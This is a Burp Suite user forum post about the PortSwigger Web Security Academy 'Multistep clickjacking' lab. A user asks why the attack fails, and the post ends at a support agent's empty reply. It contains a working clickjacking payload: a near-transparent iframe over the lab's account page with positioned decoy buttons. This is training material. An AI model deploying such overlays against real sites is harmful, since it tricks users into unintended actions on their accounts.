The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Multistep clickjacking - Not working with proper alignment

Vaibhav | Last updated: Apr 19, 2023 02:40PM UTC

This is not working for "Multistep clickjacking" lab. I have tested it in chrome browser and the both buttons align properly. <style> iframe { position:relative; width:500px; height: 700px; opacity: 0.0001; z-index: 2; } .firstClick, .secondClick { position:absolute; top:530px; left:50px; z-index: 1; } .secondClick { top:293px; left:217px; } </style> <div class="firstClick">Test me first</div> <div class="secondClick">Test me next</div> <iframe src="https://0a5500a104d8653b823c7965008100fb.web-security-academy.net/my-account"></iframe>

Ben, PortSwigger Agent | Last updated: Apr 20, 2023 06:44AM UTC